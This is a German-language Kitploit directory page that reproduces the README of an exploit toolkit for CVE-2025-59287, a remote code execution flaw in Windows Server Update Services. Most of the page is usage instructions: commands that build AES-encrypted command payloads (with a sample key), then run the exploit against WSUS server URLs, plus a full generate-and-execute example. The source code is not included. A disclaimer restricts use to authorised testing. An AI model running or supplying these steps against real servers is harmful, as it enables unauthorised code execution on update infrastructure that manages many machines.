Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-59287 — Exploitation-Toolkit für CVE-2025-59287 RCE in WSUS. Enthält AES-Payload-Verschlüsselung und ein Exploitation-Modul für autorisierte Penetrationstests. | Kitploit
Tools/GitHubGitHub/adel-hx0d/cve-2025-59287
Verschlüsselungs-/EntschlüsselungstoolsPayload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsLernen & Bildung
GitHubadel-hx0d/cve-2025-59287

cve-2025-59287

Exploitation-Toolkit für CVE-2025-59287 RCE in WSUS. Enthält AES-Payload-Verschlüsselung und ein Exploitation-Modul für autorisierte Penetrationstests.

Repository anzeigen
18vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59287 - WSUS-Exploitation-Toolkit

von adel-h4x0a

⚠️ Nur für Bildungs- und autorisierte Testzwecke ⚠️

Überblick

Dieses Toolkit demonstriert die Ausnutzung von CVE-2025-59287, einer Remotecodeausführung-Schwachstelle in Windows Server Update Services (WSUS).

Komponenten

  1. Verschlüsselungsmodul (cve-2025-59287-encr.py)

· AES-Payload-Verschlüsselung für die WSUS-Kommunikation · Unterstützung sowohl für Legacy- als auch für sichere Verschlüsselungsmodi · Benutzerdefinierte Payload-Generierung

  1. Exploit-Modul (cve-2025-59287-exp.py)

· Vollständige Exploit-Kette für CVE-2025-59287 · Robuste Fehlerbehandlung und Wiederholungslogik · Unterstützung für benutzerdefinierte Payloads

Struktur

📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py      # Verschlüsselungsmodul
├── 📄 cve-2025-59287-exp.py       # Exploit-Modul
├── 📄 requirements.txt            # Abhängigkeiten
└── 📄 README.md                   # Diese Datei

Verwendung

Voraussetzungen

pip install -r requirements.txt

Verschlüsselung

# Basisverschlüsselung
python cve-2025-59287-encr.py --command "calc" --mode legacy

# Verschlüsselung mit benutzerdefiniertem Schlüssel
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"

# Ausgabe in Datei speichern
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt

Exploit

# Basis-Exploit
python cve-2025-59287-exp.py http://wsus-server:8530

# Mit benutzerdefiniertem Payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt

# Mit erweiterten Einstellungen
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5

Optionen

Verschlüsselungsmodul (cve-2025-59287-encr.py)

· --key: AES-Schlüssel im Hex-Format (optional) · --command: Auszuführender Befehl (Standard: calc) · --mode: Verschlüsselungsmodus [legacy, secure] (Standard: legacy) · --output: Ausgabedatei zum Speichern des Payloads (optional)

Exploit-Modul (cve-2025-59287-exp.py)

· target: WSUS-Server-URL (erforderlich) · --payload: Benutzerdefinierte Base64-Payload-Datei (optional) · --timeout: Request-Timeout in Sekunden (Standard: 30) · --retries: Anzahl der Wiederholungsversuche (Standard: 3) · --no-banner: Banneranzeige unterdrücken (optional)

Vollständiges Beispiel

# Benutzerdefinierten Payload generieren
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt

# Exploit ausführen
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt

Rechtlicher Hinweis

❗ Wichtige Warnung:

Dieses Tool wird nur für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal.

Dieses Tool sollte nur in folgenden Fällen verwendet werden:

· Testumgebungen, die Ihnen gehören · Systeme, für die Sie eine schriftliche Genehmigung zum Testen erhalten haben · Bildungs- und akademische Zwecke

Der Entwickler übernimmt keine Verantwortung für eine illegale oder unbefugte Nutzung dieses Tools.

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

Updates

· v1.0: Erste Veröffentlichung mit vollständiger Exploit-Unterstützung · v1.1: Verbesserte Fehlerbehandlung und verbesserte Protokollierung

Mitwirken

Fehlerberichte und Pull-Requests sind erwünscht, um das Tool im Rahmen einer verantwortungsvollen und ethischen Nutzung zu verbessern.


Hinweis: Holen Sie vor dem Testen eines Systems immer eine schriftliche Genehmigung ein. Sicherheitsbewusstsein beginnt mit Verantwortung. 🔒

Tool herunterladen